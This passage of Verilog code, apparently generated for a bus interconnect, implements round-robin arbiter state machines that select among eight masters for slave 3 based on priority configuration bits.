                        s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[6] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[7] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[0] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[1] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[2] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant4:
        begin
            if (  !( s3_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[5] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[6] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[7] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[0] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[1] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[2] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[3] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant5:
        begin
            if (  !( s3_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[6] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[7] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[0] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[1] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[2] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[3] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[4] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant6:
        begin
            if (  !( s3_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[7] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[0] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[1] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[2] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[3] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[4] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[5] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant7:
        begin
            if (  !( s3_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[0] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[1] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[2] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[3] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[4] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[5] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[6] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s3_msel_arb1_req = { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd1 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd1 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd1 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd1 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd1 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd1 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd1 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s3_msel_arb1_state <= s3_msel_arb1_grant0;
        end
        else
        begin 
            s3_msel_arb1_state <= s3_msel_arb1_next_state;
        end
    end
    always @ (  s3_msel_arb1_state or  { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd1 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd1 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd1 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd1 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd1 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd1 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd1 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s3_msel_arb1_next_state = s3_msel_arb1_state;
        case ( s3_msel_arb1_state ) 
        s3_msel_arb1_grant0:
        begin
            if (  !( s3_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[1] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[2] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[3] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[4] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[5] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[6] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[7] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant1:
        begin
            if (  !( s3_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[2] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[3] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[4] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[5] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[6] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[7] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[0] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant2:
        begin
            if (  !( s3_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[3] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[4] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[5] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[6] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[7] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[0] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[1] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant3:
        begin
            if (  !( s3_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[4] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[5] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[6] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[7] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[0] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[1] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[2] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant4:
        begin
            if (  !( s3_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[5] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[6] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[7] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[0] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[1] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[2] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[3] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant5:
        begin
            if (  !( s3_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[6] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[7] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[0] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[1] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[2] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[3] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[4] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant6:
        begin
            if (  !( s3_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[7] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[0] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[1] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[2] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[3] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[4] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[5] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb1_grant7:
        begin
            if (  !( s3_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s3_msel_arb1_req[0] ) 
                begin
                    s3_msel_arb1_next_state = s3_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s3_msel_arb1_req[1] ) 
                    begin
                        s3_msel_arb1_next_state = s3_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s3_msel_arb1_req[2] ) 
                        begin
                            s3_msel_arb1_next_state = s3_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s3_msel_arb1_req[3] ) 
                            begin
                                s3_msel_arb1_next_state = s3_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s3_msel_arb1_req[4] ) 
                                begin
                                    s3_msel_arb1_next_state = s3_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb1_req[5] ) 
                                    begin
                                        s3_msel_arb1_next_state = s3_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb1_req[6] ) 
                                        begin
                                            s3_msel_arb1_next_state = s3_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s3_msel_arb2_req = { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd2 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd2 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd2 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd2 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd2 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd2 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd2 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s3_msel_arb2_state <= s3_msel_arb2_grant0;
        end
        else
        begin 
            s3_msel_arb2_state <= s3_msel_arb2_next_state;
        end
    end
    always @ (  s3_msel_arb2_state or  { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd2 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd2 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd2 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd2 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd2 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd2 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd2 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s3_msel_arb2_next_state = s3_msel_arb2_state;
        case ( s3_msel_arb2_state ) 
        s3_msel_arb2_grant0:
        begin
            if (  !( s3_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[1] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[2] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[3] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[4] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[5] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[6] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[7] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant1:
        begin
            if (  !( s3_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[2] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[3] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[4] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[5] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[6] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[7] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[0] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant2:
        begin
            if (  !( s3_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[3] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[4] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[5] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[6] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[7] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[0] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[1] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant3:
        begin
            if (  !( s3_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[4] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[5] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[6] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[7] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[0] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[1] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[2] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant4:
        begin
            if (  !( s3_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[5] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                end
                else
                begin 
